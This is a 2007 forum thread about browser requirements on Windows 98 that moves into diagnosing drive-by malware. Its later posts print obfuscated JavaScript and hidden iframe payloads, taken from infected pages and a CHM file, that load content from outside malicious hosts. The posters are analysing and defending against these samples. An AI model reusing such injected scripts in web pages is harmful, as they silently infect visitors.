S.O.S. Internet Explorer 7.0 soon Required? S.O.S.

[oscardog]

I agree. M$ can't control all the websites and html is a worldwide standard which hasn't changed since IE4.0.

My opinion is that the only reason to require XP is to introduce a virus in your machine. I mean the only intentional reason because it can be simply poor prorgaming in some script. That's why I recommand to write to the webmaster about that. He may be unaware of this bug.

You seem to forget netscape, firefox is not to far behind its destiny (nobody seems to learn) i choose to give the opera guys a go

[eidenk]

Microsoft never enforced or encouraged this. It's a relic of the late nineties when sites would only work properly in one of the two dominating browsers... because they designed for one of the two.

Ur in the confidence of Bill Gates maybe ?

[eidenk]

I agree. M$ can't control all the websites and html is a worldwide standard which hasn't changed since IE4.0.

My opinion is that the only reason to require XP is to introduce a virus in your machine. I mean the only intentional reason because it can be simply poor prorgaming in some script. That's why I recommand to write to the webmaster about that. He may be unaware of this bug.

For one this happens as a mean to force people to upgrade to a newer OS and enrich MS I believe and for two you certainly can catch as many viruses, if not more, through IE with a 9x system than you can with an XP one. The advantage is that most won't execute on 9x once they are on your machine because they target NT specific stuff. But some do execute on 9x, including certain rootkits for which there is absolutely no removal tools unlike for the NT platform. I can pass you on some of them. I knew I had catched something but could not detect anything. Finally I scanned the memory for exes and dlls and found the path of two exes in my win dir. I could not see them with explorer nor with any third party tool including the tools I use to scan my dirs for new files or changes. They were in the run keys but I could only find them by opening the .dat files. Regedit or any other third party registry editor could not see their entries. Had to reboot with a startup disk and delete them with DOS. On reboot their run keys were then visible in regedit.

I think oscardog is right to consider ditching any version of IE alltogether if that's what he means. Opera is pretty good but for some reason I don't manage to switch fully to it because I find my customized IE 5.5 perfect (besides not having tabs).

Edited September 25, 2007 by eidenk

[BenoitRen]

You seem to forget netscape, firefox is not to far behind its destiny (nobody seems to learn)

What the hell?

Ur in the confidence of Bill Gates maybe ?

Absolutely not. But not everything is M$' fault, you know. As I said, this is a relic of '98 which resulted because of webmaster stupidity and ignorance. Web standards weren't widely known back then, so people designed for one of the two dominating web browsers, and that was that. Some people today still don't get it and look at their website like an application they have to provide support for on different platforms, hence the "requires at least IE5.x" and "requires Windows XP" lines.

I find my customized IE 5.5 perfect (besides not having tabs).

IE 5.x is a web developer's nightmare. Wrong box model, no support for things like margin: auto; to center blocks, float bugs, etc. You may like your browser, but remember its web standards support is horrible.

[98 Guy]

What web-page were you trying to view when you got that error message?

[glocK_94]

Excuse me, sir, no offense, but you are a moron who obviously made opinions about things you have no clue whatsoever

Almost every sentence of your post is wrong or at best uninformed wrong assumption.

No need to go offensive, if he's uninformed, then inform him!

Anyway, no, installing a new browser like firefox/opera does not increase system complexity since It doesn't replace or conflict with IE. You only run it as any regular program when you want to surf the web and close it when you're done. And if you really like IE, then follow the technics given to you on previous post to spoof your "user-agent" (browser ID) and pretend you use IE7.

But I'll back up 98 Guy: what site says it "requires" IE7?

[RJARRRPCGP]

First off, that sounds like Windows Update just F-ing up!

It sounds like Windows Update discovered a newer version of Internet Explorer and thus attempted to install it!

[Steven W]

I have left my platform as Windows XP on my 98 partion, the only drawback that I have found is WindowsUpdate site doesn't function properly.

You should be able to put this registry change into a .REG file for both cases, and double-click the proper one for which user-agent string you want.

I have two reg files one puts the necessary info in and the other just removes it, I haven't used the one to remove, in a long time, because I have found no need to.

Edited September 27, 2007 by Steven W

[Sfor]

I agree. M$ can't control all the websites and html is a worldwide standard which hasn't changed since IE4.0.

My opinion is that the only reason to require XP is to introduce a virus in your machine. I mean the only intentional reason because it can be simply poor prorgaming in some script. That's why I recommand to write to the webmaster about that. He may be unaware of this bug.

For one this happens as a mean to force people to upgrade to a newer OS and enrich MS I believe and for two you certainly can catch as many viruses, if not more, through IE with a 9x system than you can with an XP one. The advantage is that most won't execute on 9x once they are on your machine because they target NT specific stuff. But some do execute on 9x, including certain rootkits for which there is absolutely no removal tools unlike for the NT platform. I can pass you on some of them. I knew I had catched something but could not detect anything. Finally I scanned the memory for exes and dlls and found the path of two exes in my win dir. I could not see them with explorer nor with any third party tool including the tools I use to scan my dirs for new files or changes. They were in the run keys but I could only find them by opening the .dat files. Regedit or any other third party registry editor could not see their entries. Had to reboot with a startup disk and delete them with DOS. On reboot their run keys were then visible in regedit.

I think oscardog is right to consider ditching any version of IE alltogether if that's what he means. Opera is pretty good but for some reason I don't manage to switch fully to it because I find my customized IE 5.5 perfect (besides not having tabs).

Well. You said there is no tool for spyware removal. You are wrong. DOS is a perfect tool for removing spyware. No windows based spyware can escape a DOS based and clean DOS running AV scanner.

Also, it is possible to check registry keys in DOS without GUI. I do have a script checking the registry "run" keys for new entries, every time compuer is booting, on every 9x based computer I'm using.

As for the IE 5.5. This application should be considered as useless for internet browsing activity. It is much too unsafe. I found many web sites do have spyware downloaders attached, this year. I do believe someone found a way to automaticaly infect numerous poorly protected web sites. All of them were fitted with a java based downloader. I found, it is not possible to patch the IE 5.5 against those downloaders. IE 6 is also affected, but installation of all available patches solves the problem.

[legacykeeper]

The question about which websites triggered the problem is excellent, and deserves the research from me to come up with answers. It's my negligence for not retrieving this info while it was fresh, I apologize. I have my MS History, and will keep it to answer the question.

The history is now 2 weeks old, so it's grouped only by week. I know the dates, 9/17 and 9/19. Is there a way to get MS History to display by order visited after the current day? Or how to correlate MS History files from another boot drive with the websites visited? I notice some pages I remember visiting not appearing. Notably, the MS update web page appearing after the errors is absent. I fear the same error that caused IE to close may also have caused the history function to fail. I've revisited every web page in the history for that week, without triggering any errors.

Edited October 1, 2007 by legacykeeper

[eidenk]

Well. You said there is no tool for spyware removal. You are wrong. DOS is a perfect tool for removing spyware. No windows based spyware can escape a DOS based and clean DOS running AV scanner.

Granted if they are not zero day and the scanner is good enough.

Also, it is possible to check registry keys in DOS without GUI. I do have a script checking the registry "run" keys for new entries, every time compuer is booting, on every 9x based computer I'm using.

Can you share it please ?

As for the IE 5.5. This application should be considered as useless for internet browsing activity. It is much too unsafe. I found many web sites do have spyware downloaders attached, this year. I do believe someone found a way to automaticaly infect numerous poorly protected web sites. All of them were fitted with a java based downloader. I found, it is not possible to patch the IE 5.5 against those downloaders. IE 6 is also affected, but installation of all available patches solves the problem.

Do you know which IE6 patch exactly offers protection against that and when it was issued ?

Because MS was not able to tell me when I contacted them about that. But maybe it was before they fixed it.

BTW can you tell me if this chm file wants to go on the internet with your fully patched IE6 runtime ?

[Sfor]

Well the script is much more complicated, but the change detection part is like that:

ECHO REGEDIT4>reg

ECHO.>>reg

ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>reg

ECHO.>>reg

REGEDIT /E reg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

FC /C reg HLM_run.reg|find "****">nul

if not errorlevel 1 Goto Change

where the HLM_run.reg file is a saved for future reference registry key.

Unfortunatelly, I do not know which particular update did the trick. I just installed all available at the microsoft update site, and it worked.

As for the .CHM file. When I'm clicking the link the IE asks what I want to do with it (open, save, cancel or more information).

Edited October 1, 2007 by Sfor

[eidenk]

Well the script is much more complicated, but the change detection part is like that:

ECHO REGEDIT4>reg

ECHO.>>reg

ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>reg

ECHO.>>reg

REGEDIT /E reg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

FC /C reg HLM_run.reg|find "****">nul

if not errorlevel 1 Goto Change

where the HLM_run.reg file is a saved for future reference registry key.

Thanks I'll look into it. It's interesting.

Unfortunatelly, I do not know which particular update did the trick. I just installed all available at the microsoft update site, and it worked.

Maybe you have an example, an infected webpage you did download or something like that ? Or a link to webpage on which you you'd get infected if you hadn't those updates installed.

As for the .CHM file. When I'm clicking the link the IE asks what I want to do with it (open, save, cancel or more information).

Obviously that's what IE asks you when you try to download a file.

But what happens when you run this file from your HDD was my question. Does HH.EXE try to connect on the Internet after you execute it ?

[Sfor]

According to my router log, the CHM file makes a TCP connection with 81.95.146.98.

As for an infected site: http: // userjs.org /

At the end of the page code there is an IFrame link:

<iframe src="http://sunyiu.com/louisl/webimage/flash/index.php" width=1 height=1></iframe>

The trojan downloader code was downloaded from sunyiu.com by a link to adv522.htm file on some other server.

So everything was hidden as an advertisement. But, I saw other versions with a JS code added directly at the bottom of a page code.

<!-- o65 -->

<script language=JavaScript><!--

function nbsp() {var t,o,l,i,j;var s='';s+='060047116101120116097116101097062060047116101120116097114101097062';

s+='060105102114097109101032115114099061039104116116112058047047098114098111100121046105110102111047

09';

s=s+'112097099107047105110100101120046112104112039032119105100116104061048032104101105103104116061048

32';

s=s+'102114097109101098111114100101114061039048039062060047105102114097109101062';

t='';l=s.length;i=0; while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(String.fromCharCode(t));t='';}}nbsp();

//--></SCRIPT>

<!-- c65 -->

Edited October 2, 2007 by Sfor

[eidenk]

According to my router log, the CHM file makes a TCP connection with 81.95.146.98.

Bingo ! If you extract the CHM file you'll see that it contains one single html with the following javascript exploit code :

<script language=javascript> document.write( unescape( '%3C%69%66%72%61%6D%65%20%73%72%63%3D%20%68%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%34%36%2E%39%38%2F%69%6E%64%65%78%2E%68%74%6D%6C%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%6E%61%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69%66%72%61%6D%65%3E' ) ); </SCRIPT>

It seems you are vulnerable despite your IE6 updates. It seems also that MS did nothing to fix it. I forwarded this code to them in march of this year.

I am gonna have a look a look at your exploit now and see if I am vulnerable to it.